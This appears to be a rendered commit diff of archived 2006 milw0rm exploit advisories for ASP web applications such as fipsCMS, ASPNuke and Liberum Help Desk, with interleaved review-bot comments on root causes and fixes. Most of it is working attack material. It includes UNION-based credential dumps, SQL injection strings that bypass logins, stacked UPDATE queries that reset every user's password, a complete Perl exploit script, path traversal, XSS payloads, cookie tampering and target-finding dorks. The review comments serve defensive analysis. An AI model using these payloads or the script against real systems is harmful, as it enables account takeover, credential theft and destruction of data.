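Review bot: `<input type="hidden" name="UserID" size="4">` together with the instruction `Change: ... => ID` is the whole issue: `save_profile.asp` trusts a client-supplied `UserID` to decide whose profile, including `Password`, is updated, an authorization flaw rather than an injection, and the `key=1&regkey=` query string (with `regkey` empty) adds no check. The fix is for `save_profile.asp` to take the user identity from the authenticated session and ignore any posted `UserID`; logging profile and password changes with both the session user and the posted id makes mismatches visible. The `[Code]]]` / `[/Code]]]` markers inside the HTML comments are leftovers from a forum post, not part of the page.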

View file

@ -1,19 +1,19 @@
*******************************************************************************
# Title : Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
Example:
###http://[target]/[path]/admin/
UserName: ' union select 0,0 from admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-13]
*******************************************************************************
# Title : Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
Example:
###http://[target]/[path]/admin/
UserName: ' union select 0,0 from admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-13]
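Review bot: `UserName: ' union select 0,0 from admin` against `vir_Login.asp` indicates a login check that only tests whether the credentials query returns a row, not whether the returned row's password matches, so a UNION that appends any two-column row is enough to pass. That implies two fixes, not one: parameterize the query, and fetch the user by name alone and compare the stored (hashed) credential in code. The path template here is `http://[target]/[path]/admin/` without the doubled slash used by the other entries, so the header format is inconsistent across the commit.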

View file

@ -1,19 +1,19 @@
*******************************************************************************
# Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
Example:
###http://[target]/[path]/admin/
UserName: ' union select 0,0,0,0,0,0,0,0 from categories
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-14]
*******************************************************************************
# Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
Example:
###http://[target]/[path]/admin/
UserName: ' union select 0,0,0,0,0,0,0,0 from categories
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-14]
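Review bot: same pattern as the Property Pro entry, with one detail worth keeping: the UNION selects from `categories`, an unrelated table, which shows the bypass needs no knowledge of the credentials table at all, only a column count (8) matching the login query; a login that verifies the password against the fetched row rather than on row existence closes it regardless of which table is named.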

View file

@ -1,20 +1,20 @@
*******************************************************************************
# Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
###http://[target]/[path]//page.asp?NewsID=[SQL]
Example:
//page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-14]
*******************************************************************************
# Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
###http://[target]/[path]//page.asp?NewsID=[SQL]
Example:
//page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-14]

View file

@ -1,24 +1,24 @@
blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/
product:blogme v3
bug:login bypass & xss (post)
risk:high
admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '
xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14]
blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/
product:blogme v3
bug:login bypass & xss (post)
risk:high
admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '
xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14]
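Review bot: `passwd: 1'='1' ro '` has `ro` where `or` was clearly intended, a typo in the published string, so the advisory's password value should not be copied into a regression test verbatim. The XSS section names fields only (`Name`, `URL`, `Comments` on `/comments.asp?blog=85`) with no output context; the corresponding fix is to output-encode those three fields wherever comments are rendered, and for the login, to replace the string-built credential query with a parameterized one. `risk:high` and the vendor line are the only metadata; no version beyond `v3` is given.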

View file

@ -1,22 +1,22 @@
vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql (post) :
http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
( or just post your query in the search engine ... )
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14]
vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql (post) :
http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
( or just post your query in the search engine ... )
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14]
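Review bot: the entry has no title line (it opens with `vendor site:http://hpe.net/`), so the archive filename is the only place the product is named; a title in the same form as the other entries would fix that. Two injection points are reported: the login (`username: 'or''='` / `passwd: 'or''='`, the same row-existence bypass as the Property Pro entry) and a POST to `search_list.asp` with `Hpecs_Find=maingroup&searchstring='[sql]`. The latter matters for logging: search fields are routinely exempted from input rules and the string arrives in the request body, so body-aware inspection or, better, parameterizing the search query is what closes it.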

View file

@ -1,57 +1,57 @@
*******************************************************************************
# Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
# Author : ajann
# S.Page : http://www.aspnuke.com
# D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470
*******************************************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ASP Nuke
Kenneth W. Richards
Orvado Technologies
-Introduction-
ASP Nuke is an open-source software application for running a
community-based web site on a web server.
By open-source, we mean the code is freely available for others to read,
modify and use in accordance
with the software license.
ASP Nuke is an extensible framework that allows you to upgrade and add
applications to the website quickly
and easily. It uses a modular architecture allowing others to rapidly
develop new modules and site operators
to re-organize the layout and navigation for their site.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerability::
_________________
###http://[target]/[path]//module/account/register/register.asp?StateCode=[SQL]&..&..&..&..&..&..&..&..&....
Example = Poll Update
///module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register
Note: Change UserName because ; failed:already username dont write.
Some tables,columns
___________________
[tblMember] | [FaqQuestion]
MemberID | QuestionID
Username | DocumentID
Password | Question
Firstname | Answer
Middlename | Active
EmailAddress | OrderNo
.. | ..
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-19]
*******************************************************************************
# Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
# Author : ajann
# S.Page : http://www.aspnuke.com
# D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470
*******************************************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ASP Nuke
Kenneth W. Richards
Orvado Technologies
-Introduction-
ASP Nuke is an open-source software application for running a
community-based web site on a web server.
By open-source, we mean the code is freely available for others to read,
modify and use in accordance
with the software license.
ASP Nuke is an extensible framework that allows you to upgrade and add
applications to the website quickly
and easily. It uses a modular architecture allowing others to rapidly
develop new modules and site operators
to re-organize the layout and navigation for their site.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerability::
_________________
###http://[target]/[path]//module/account/register/register.asp?StateCode=[SQL]&..&..&..&..&..&..&..&..&....
Example = Poll Update
///module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register
Note: Change UserName because ; failed:already username dont write.
Some tables,columns
___________________
[tblMember] | [FaqQuestion]
MemberID | QuestionID
Username | DocumentID
Password | Question
Firstname | Answer
Middlename | Active
EmailAddress | OrderNo
.. | ..
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-19]
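Review bot: unlike the other SQL-injection entries in this commit, the example is a stacked query, `StateCode=0',0,0,0,0,0);update tblPoll set Question = 'hacked'--`, so the impact is a write (`UPDATE`), not a read, and the title's bare "Remote SQL Injection" understates it. `Note: Change UserName because ; failed:already username dont write.` is garbled; it means the `Username` value in the example must be unique, because the registration INSERT fails on a duplicate name before the injected statement runs. The `ASP Nuke` / `Kenneth W. Richards` / `Orvado Technologies` block between the `+++` rules is the project's own description pasted in, not vulnerability information. Mitigation is binding `StateCode` and the other `register.asp` fields as parameters, and disabling multi-statement execution on the database connection where the driver allows it.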

View file

@ -1,58 +1,58 @@
#!/usr/bin/perl
#[Script Name: fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "index.asp?lg=1&w=forumshow&fcat=-1&fansweres=True&froot=1&fid=";
$target = "-1%20union%20select%200,0,0,0,0,adminpword,0,0,0,0,0,0%20from%20admin%20where%20adminid%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /\"150\" value=\"Re:(.*?)class=\"/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-22]
#!/usr/bin/perl
#[Script Name: fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "index.asp?lg=1&w=forumshow&fcat=-1&fansweres=True&froot=1&fid=";
$target = "-1%20union%20select%200,0,0,0,0,adminpword,0,0,0,0,0,0%20from%20admin%20where%20adminid%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /\"150\" value=\"Re:(.*?)class=\"/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-11-22]
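Review bot: the removed and added halves of this hunk are textually identical (the script tail from `$target = $host.$dir.$file.$target;` through the milw0rm stamp reappears verbatim as the full added file), so whatever changed is invisible in the rendered diff, most likely line endings or trailing whitespace; a commit message saying so (e.g. "normalize CRLF") would spare reviewers diffing the two copies by hand. Two style points in the script itself: it runs without `use strict; use warnings;`, so `$server`, `$target` and `$answer` are silently created as globals, and the `/e` flag on `s/(http:\/\/)//eg` evaluates an empty replacement as Perl code for no reason; `s{^http://}{}` expresses the intent. The success test also keys on one exact HTML fragment (`"150" value="Re:`), so the closing "Exploit failed" message is printed both when the server rejects the request and when the page layout merely differs, which makes the result ambiguous for anyone reproducing the report.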

View file

@ -1,24 +1,24 @@
*******************************************************************************
# Title : fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : 29 Euro
*******************************************************************************
###http://[target]/[path]//index1.asp?what=artists&which=[SQL]
Example:
//index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin
See you Admin Hash..
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-22]
*******************************************************************************
# Title : fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : 29 Euro
*******************************************************************************
###http://[target]/[path]//index1.asp?what=artists&which=[SQL]
Example:
//index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin
See you Admin Hash..
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-22]
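Review bot: the header carries `# $$$ : 29 Euro` with no indication of what the figure refers to (the product's price, presumably), while the fields a reader actually needs are missing: no vendor or download URL, no source for the affected version beyond the title, and no statement of whether a fixed release exists. The ASP-Nuke entry later in this diff shows the house format for that (`# S.Page`, `# D.Page`) and this file should follow it. The root cause is also only implicit in the PoC URL; one sentence stating that the `which` parameter is concatenated into the query unparameterized, plus the remediation (parameterized queries, and not exposing the `admin` table's `password` column to the web tier), would make the entry useful to defenders as well as to testers.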

View file

@ -1,22 +1,22 @@
*******************************************************************************
# Title : fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
*******************************************************************************
###http://[target]/[path]//default2.asp?kat=[SQL]
Example:
//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-22]
*******************************************************************************
# Title : fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
*******************************************************************************
###http://[target]/[path]//default2.asp?kat=[SQL]
Example:
//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-22]
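Review bot: `# Contact : :(` is an empty field dressed up as a filled one; either drop the line or give a real contact. Like the fipsGallery entry above, this advisory names no vendor page and no fix status, and the affected-parameter description is only a URL template. The two facts a defender needs are left for the reader to infer from `default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config`: that a single `kat=` value reaches the query without validation, and that the `config` table's `pw_admin` column is readable over the same database connection the forum uses. Spelling both out (input handling, and least privilege on the application's database account) would turn the URL into an advisory.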

View file

@ -1,23 +1,23 @@
*******************************************************************************
# Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license
*******************************************************************************
###http://[target]/[path]//details.asp?id=[SQL]
Example:
//details.asp?id=2)%20update%20tblusers%20set%20password='kro'--
=> All Password Changed to "kro"
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-25]
*******************************************************************************
# Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license
*******************************************************************************
###http://[target]/[path]//details.asp?id=[SQL]
Example:
//details.asp?id=2)%20update%20tblusers%20set%20password='kro'--
=> All Password Changed to "kro"
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-25]
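Review bot: the `# Dork :` line opens a double quote that is never closed and breaks off mid-sentence at "Please view the license", so the search string is either truncated or was never finished; complete it or quote it properly. Substantively, the example is a stacked `UPDATE` that the file itself says changes every user's password to "kro": the entry should flag it as destructive (it is not a read-only PoC) and should record what makes it possible, namely that the `id` parameter reaches the query unparameterized, that the database layer accepts a second statement after the closing `)`, and that the application's database account holds UPDATE on `tblusers`. Each of those is a separate mitigation point and none of them is stated.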

View file

@ -1,12 +1,12 @@
# Title : basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "This script created by www.script.canavari.com"
---------------------------------------------------------------------------
http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler
---------------------------------------------------------------------------
# Just for Fun!!
# milw0rm.com [2006-11-25]
# Title : basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "This script created by www.script.canavari.com"
---------------------------------------------------------------------------
http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler
---------------------------------------------------------------------------
# Just for Fun!!
# milw0rm.com [2006-11-25]
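Review bot: the only source for the affected version is the file's own title ("basicforum v 1.1"); the dork quoted on the next line identifies the vendor site (www.script.canavari.com) but not a version, so the version claim cannot be checked from this file. There is also no vendor link, fix status or description beyond the URL and the trailing milw0rm stamp, and `# Just for Fun!!` carries no information. A one-line root-cause statement in its place (the `id` parameter of `edit.asp?type=message` is concatenated into a query that reads `kullanici,sifre` from `uyeler`, i.e. usernames and passwords) would give defenders something to act on.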

View file

@ -1,32 +1,32 @@
**************************************************************************************************
# Title : ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability
# Author : ajann
# S.Page : http://www.rot.dk
# D.Page : http://www.rot.dk/aspnuke/downloads.asp
# Greetz : Nukedx
**************************************************************************************************
Cookie
----------
Open the Cookie Editor=>
Find cookie informations.
Change Informations=
Cookie Informations:
ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for
ASPNUKE14%5Fpseudo , pseudo => Login UserName
ASPNUKE14%5Fpseudoid , pseudoid => UserId
ASPNUKE14%5Femail , email => User Email
Save and go to default.asp.
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-25]
**************************************************************************************************
# Title : ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability
# Author : ajann
# S.Page : http://www.rot.dk
# D.Page : http://www.rot.dk/aspnuke/downloads.asp
# Greetz : Nukedx
**************************************************************************************************
Cookie
----------
Open the Cookie Editor=>
Find cookie informations.
Change Informations=
Cookie Informations:
ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for
ASPNUKE14%5Fpseudo , pseudo => Login UserName
ASPNUKE14%5Fpseudoid , pseudoid => UserId
ASPNUKE14%5Femail , email => User Email
Save and go to default.asp.
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-25]
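Review bot: the `ASPNUKE14%5Fpseudoname` line ends in a dangling "see for", so that step's explanation is cut off and should be finished or removed; "Find cookie informations." and "Change Informations=" also want a grammar pass. The more important omission is the root cause: the four `ASPNUKE14_*` cookies (`pseudo`, `pseudoid`, `email`, `pseudoname`) are treated by the application as the sole statement of who the visitor is, with no server-side session or integrity check binding them to an authenticated login, which is why editing them in a browser cookie editor and reloading `default.asp` is enough. Stating that, together with the fix (keep identity in a server-side session, or at minimum sign the cookie and verify the signature on every request), is what separates an advisory from a step list.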

View file

@ -1,12 +1,12 @@
# Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "SimpleBlog 2.3 by 8pixel.net"
---------------------------------------------------------------------------
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
---------------------------------------------------------------------------
# Just for Fun!!
# milw0rm.com [2006-11-26]
# Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "SimpleBlog 2.3 by 8pixel.net"
---------------------------------------------------------------------------
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
---------------------------------------------------------------------------
# Just for Fun!!
# milw0rm.com [2006-11-26]
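Review bot: the affected page is `/admin/edit.asp`, yet the entry says nothing about whether the admin area is reachable without logging in; the Ultimate HelpDesk entry further down states "Login Before Vulnerabilities" explicitly, and this file should make the same call either way, because it decides whether this is an unauthenticated credential disclosure or a post-authentication one. Beyond that, the entry shares the gaps of the basicforum file by the same author: no vendor link, no fix status, and the root cause (the `id` parameter concatenated into a query over `t_users`, exposing `uUSERNAME` and `uPASSWORD`) left for the reader to infer from the URL.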

View file

@ -1,39 +1,39 @@
*******************************************************************************
# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
# Author : ajann
# Contact : :(
*******************************************************************************
Login Before Vulnerabilities.:
[[SOURCE]]]------------------------------------------------------
http://[target]/[path]//getfile.asp?filename=[SQL]
Example:
//getfile.asp?filename=../index.asp
//getfile.asp?filename=../../../boot.ini
[[/SOURCE]]]
[[XSS]]]---------------------------------------------------------
http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]
Example:
//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E
[[/XSS]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-01]
*******************************************************************************
# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
# Author : ajann
# Contact : :(
*******************************************************************************
Login Before Vulnerabilities.:
[[SOURCE]]]------------------------------------------------------
http://[target]/[path]//getfile.asp?filename=[SQL]
Example:
//getfile.asp?filename=../index.asp
//getfile.asp?filename=../../../boot.ini
[[/SOURCE]]]
[[XSS]]]---------------------------------------------------------
http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]
Example:
//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E
[[/XSS]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-01]
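Review bot: the first section is labelled `[[SOURCE]]]` and uses a `[SQL]` placeholder, but the examples (`../index.asp`, `../../../boot.ini`) are directory traversal through `getfile.asp?filename=`, not SQL injection, so the placeholder should read `[PATH]` or similar and the section should be named as traversal / arbitrary file read; a reader filtering the archive by vulnerability class would otherwise miss it. The bracket markers are also unbalanced throughout (`[[SOURCE]]]`, `[[/SOURCE]]]`, `[[XSS]]]`, `[[/XSS]]]`: two opening, three closing). Finally, "Login Before Vulnerabilities.:" is the one explicit precondition statement in this batch and is worth keeping; only its punctuation needs tidying.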

View file

@ -1,28 +1,28 @@
*************************************************************************************
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $2,499
*************************************************************************************
[[SQL]]]
###http://[target]/[path]//login.asp=[POST SQL]
Example:
-> All User UserName And Password Changed "kro"
// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--
[[/SQL]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-09]
*************************************************************************************
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $2,499
*************************************************************************************
[[SQL]]]
###http://[target]/[path]//login.asp=[POST SQL]
Example:
-> All User UserName And Password Changed "kro"
// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--
[[/SQL]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-09]
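Review bot: the template `###http://[target]/[path]//login.asp=[POST SQL]` is malformed; an `=` directly after the script name is not how a POST body is written, and the parameter actually injected (the `UserName` field, per the two example lines) is not named in the template at all. Write it as the form field, e.g. "POST login.asp, field UserName=[SQL]". `# $$$ : $2,499` is an unlabelled figure; say what it denotes. Both examples are stacked `UPDATE` statements that overwrite `password` and `loginName` for every row of `login`, which the file does acknowledge ("All User UserName And Password Changed") but should flag up front as a data-altering PoC whose preconditions are stacked-statement support and an application database account with write access to the `login` table.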

View file

@ -1,30 +1,30 @@
*************************************************************************************
# Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $8,000
*************************************************************************************
[[SQL]]]
###http://[target]/[path]//ProductDetails.asp=[SQL]
Example:
-> All News Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
-> Just NewsId Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--
[[/SQL]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-09]
*************************************************************************************
# Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $8,000
*************************************************************************************
[[SQL]]]
###http://[target]/[path]//ProductDetails.asp=[SQL]
Example:
-> All News Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
-> Just NewsId Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--
[[/SQL]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-09]
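Review bot: the template line `###http://[target]/[path]//ProductDetails.asp=[SQL]` has the same malformed `=` after the script name as the SpotLight entry and omits the injected parameter; both examples put the injection in `PID` (the query string ends `PID=-1;update ...`), so the template should name that parameter. The title says "(product)" where every other entry in this diff names the affected script, so `(ProductDetails.asp)` would be consistent. The two examples differ only in the `where NewsID=2` clause, and the file correctly notes that the first rewrites every `NewsTitle` in `gtsNews`; as with the other stacked-query entries, the prerequisites worth recording are stacked-statement support on the database connection and an application account holding UPDATE on `gtsNews`.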

Some files were not shown because too many files have changed in this diff.